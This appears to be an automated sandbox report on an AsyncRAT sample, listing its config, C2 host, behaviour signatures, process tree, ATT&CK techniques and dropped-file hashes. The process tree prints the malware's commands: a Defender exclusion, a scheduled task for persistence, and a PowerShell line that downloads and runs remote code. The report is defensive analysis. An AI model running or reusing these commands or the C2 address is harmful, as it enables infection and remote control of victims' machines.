Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
05/11/2024, 01:35
General
-
Target
6bcbbae880579def254a8e3d321041b4f0e76853ab30ef7205ba4f98344e321d.exe
-
Size
290KB
-
MD5
6f54a8127fa583d9bb627d9dd609faa0
-
SHA1
725b74814a9c70c26674a69f93741ec731a4284c
-
SHA256
6bcbbae880579def254a8e3d321041b4f0e76853ab30ef7205ba4f98344e321d
-
SHA512
9c5dcb237ca86f4f82c530dce0398fe78100394cce270a20bf60600a2ad3e39893b7437c792bc821910a93d670fb3e3fc6c9de2a22eff79ef3c9d7b65254297a
-
SSDEEP
6144:WtfWVjfwqnZqqHMhDVRLht8iswEcb8pPQDvv4IuWURFPtKnH7ls9UE9:WoRfwoZrHMBV9EwEcb8+DvtuWUb4ps9U
Malware Config
Extracted
asyncrat
1.0.7
Default
bay-helps.gl.at.ply.gg:36538
DcRatMutex_qwqdanchun
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Asyncrat family
-
Modifies security service 2 TTPs 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Async RAT payload 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Drops startup file 1 IoCs
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 5 IoCs
-
Drops file in System32 directory 16 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{58249d76-b139-4df5-b3f8-55149b5816c9}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding3⤵
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R3⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\6bcbbae880579def254a8e3d321041b4f0e76853ab30ef7205ba4f98344e321d.exe"C:\Users\Admin\AppData\Local\Temp\6bcbbae880579def254a8e3d321041b4f0e76853ab30ef7205ba4f98344e321d.exe"2⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "irm pastie.io/raw/fgaazw | iex"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe"C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 5684⤵
- Loads dropped DLL
- Program crash
-
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-3498378021332575111-1096393759-1283464378635328113288669565-171612110-1547546516"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "574255428-882907361-295978029-3718018192016619350-1233598176155508639-1780082308"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-995452825-237128470481109859164666532812966407201843196058-76716494-1471970092"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-16091120351154533917-1064547806575665457-686034043-219539361-84443254-1613184412"1⤵
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
101KB
MD539d81ca537ceb52632fbb2e975c3ee2f
SHA10a3814bd3ccea28b144983daab277d72313524e4
SHA25676c4d61afdebf279316b40e1ca3c56996b16d760aa080d3121d6982f0e61d8e7
SHA51218f7acf9e7b992e95f06ab1c96f017a6e7acde36c1e7c1ff254853a1bfcde65abcdaa797b36071b9349e83aa2c0a45c6dfb2d637c153b53c66fc92066f6d4f9a
-
Filesize
7KB
MD57f13b5327c363956f7fd84ca6e274595
SHA153d61536b6f6444077be0c324f70ee3c05a7f16c
SHA256329179388ffeec2a81441c2342841b102727a68dceff6a734b5df9c87c95b539
SHA5127d4707d65b52ec14fc4e5a2f36f6f465d84cd283d2a514a233f760e2f5b1f619094ccd74ce7721b706924c1ba701ab26ae50d66d33a30f214f8103463fe5c3aa
-
Filesize
290KB
MD5cc63633edfcc147cbaed1959b03d8730
SHA1df7a250eba6ee1767b09f7923bfd735635deb9e8
SHA256e699d9e9a81e9de82ce7ed645ef2a92ed6231e32cbc18a7e9ddff5c82623d417
SHA512a584893714d46c6bdf4cc0a097b5f088a9aa49eea07b181745ca9b351b570c8ac3487bfe53a8a97213f5d8a7f71dbf4070ff92eab58b2ff7a4d0e784e17d02d4
-
Filesize
141KB
MD50f3d76321f0a7986b42b25a3aa554f82
SHA17036bba62109cc25da5d6a84d22b6edb954987c0
SHA256dfad62e3372760d303f7337fe290e4cb28e714caadd3c59294b77968d81fe460
SHA512bb02a3f14d47d233fbda046f61bbf5612ebc6213b156af9c47f56733a03df1bb484d1c3576569eb4499d7b378eb01f4d6e906c36c6f71738482584c2e84b47d0
-
Filesize
150KB
MD5540138285295c68de32a419b7d9de687
SHA11cf6a2a0f53f0516ff9fe5ac733dbb5a9255ae56
SHA25633867c52f756f2b0f645f4bd503c65969d73676dcb14e6a6fdb2ffb11c7562eb
SHA5127c17c10d4b6165aa0c208811dc6d98e2f4e75e3da1cc2313cc7da9d657626beb3e4ec00b07b71376a7c549725d40db20d8952753e70acc86e87a8390e224a64a
-
Filesize
141KB
MD5831dbe568992299e589143ee8898e131
SHA1737726173aab8b76fe1f98104d72bb91abd273bf
SHA2564f22ef1625fb2a2370779d0992f80b8e5e5da8dc727aa99ade152044d28e9405
SHA51239015d29d593c9df59cdafbff95a6ddc000a5dbf767665b65f8ec65751e70315918c93d3583b922d32e9b6261b8c07023da660098ca79c5420b782c150b5c139
-
Filesize
138KB
MD5cf82e7354e591c1408eb2cc0e29dd274
SHA17e91bd50c3e6b64b81e2b5c1ce723f52e34748e9
SHA25659b5e6fbbe68f47db14a3c045b0ac1abb026c626ca4bee708fbd3940e6d2e06d
SHA51298bd4809c1c418be4100096bc9df328d2ad435c5615c082fa2bfa424935203107015862cd9c1737800b7f7bd020fea4538c325707927c1557bc3efebffb27620
-
Filesize
114KB
MD51f998386566e5f9b7f11cc79254d1820
SHA1e1da5fe1f305099b94de565d06bc6f36c6794481
SHA2561665d97fb8786b94745295feb616a30c27af84e8a5e1d25cd1bcaf70723040ea
SHA512a7c9702dd5833f4d6d27ce293efb9507948a3b05db350fc9909af6a48bd649c7578f856b4d64d87df451d0efbe202c62da7fffcac03b3fe72c7caaea553de75f
-
Filesize
668KB
MD55026297c7c445e7f6f705906a6f57c02
SHA14ec3b66d44b0d44ec139bd1475afd100748f9e91
SHA256506d3bec72805973df3b2e11aba4d074aeb4b26b7335536e79ea1145108817cc
SHA5125be8e51ecacda465b905df3e38ac114240d8fa6bae5bb17e8e53a87630454b57514ca0abbd8afefd798d450cd4ee89caf4391eeb837ced384260c188482fb48d
-
Filesize
634KB
MD51c678ee06bd02b5d9e4d51c3a4ec2d2b
SHA190aa7fdfaaa37fb4f2edfc8efc3994871087dedb
SHA2562d168ab31836a08d8ca00aab9685f040aac4052a7f10fbbf0c28e9f880a79dd3
SHA512ec665d7a20f27b2a0fe2475883009c6d34615cc2046d096de447ef57bcac9da0ae842be0556f5736f42d9c1c601fb8629896a2444990e508f7c573165088ab32
-
Filesize
727KB
MD53251572461218e279aa1ffd235c6b74d
SHA1bd6db180b78c22fab20f55dbf0f84a39a0fc19a2
SHA256baeac7bef7ece88ea3cb784effd1a34232c13d998ce272ac8bc7395e6b5ec60e
SHA512700b36964455f960511f5bbeea804febaf0ebea17a6f092cd875f7f6593ffbe79f763bd2e0bee89bb8538e67ee34c49270626d3f78db71cb39c8022d0d4baa8c
-
Filesize
715KB
MD5718bb9564980029a2e3341093a4bb082
SHA18953d96e47b65c2c70f2bcc3d9e2e7c55d41ee61
SHA256ad7b5314ef00ce846ae2c91a32dd1c1f2b4905cf182005e251ad6d4af66cc977
SHA5123f22961d108271dc098ae2c75d217991da38c18a587b44abd74da853ea26d171ca1a507c3200f3b7c2a8175bfff5a8b968a551a4804082064dc6f2ef98b5432d
-
Filesize
722KB
MD54623482c106cf6cc1bac198f31787b65
SHA15abb0decf7b42ef5daf7db012a742311932f6dad
SHA256eceda45aedbf6454b79f010c891bead3844d43189972f6beeb5ccddb13cc0349
SHA512afecefcec652856dd8b4275f11d75a68a582337b682309c4b61fd26ed7038b92e6b9aa72c1bfc350ce2caf5e357098b54eb1e448a4392960f9f82e01c447669f
-
Filesize
406KB
MD554c674d19c0ff72816402f66f6c3d37c
SHA12dcc0269545a213648d59dc84916d9ec2d62a138
SHA256646d4ea2f0670691aa5b998c26626ede7623886ed3ac9bc9679018f85e584bb5
SHA5124d451e9bef2c451cb9e86c7f4d705be65787c88df5281da94012bfbe5af496718ec3e48099ec3dff1d06fee7133293f10d649866fe59daa7951aebe2e5e67c1f
-
Filesize
168KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
140KB
-
Filesize
140KB
-
Filesize
168KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
1.1MB
-
Filesize
1.7MB
-
Filesize
248KB
-
Filesize
312KB
-
Filesize
72KB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
512KB
-
Filesize
4KB
-
Filesize
312KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
1.1MB
-
Filesize
256KB
-
Filesize
1.7MB
-
Filesize
120KB
-
Filesize
32KB
-
Filesize
2.9MB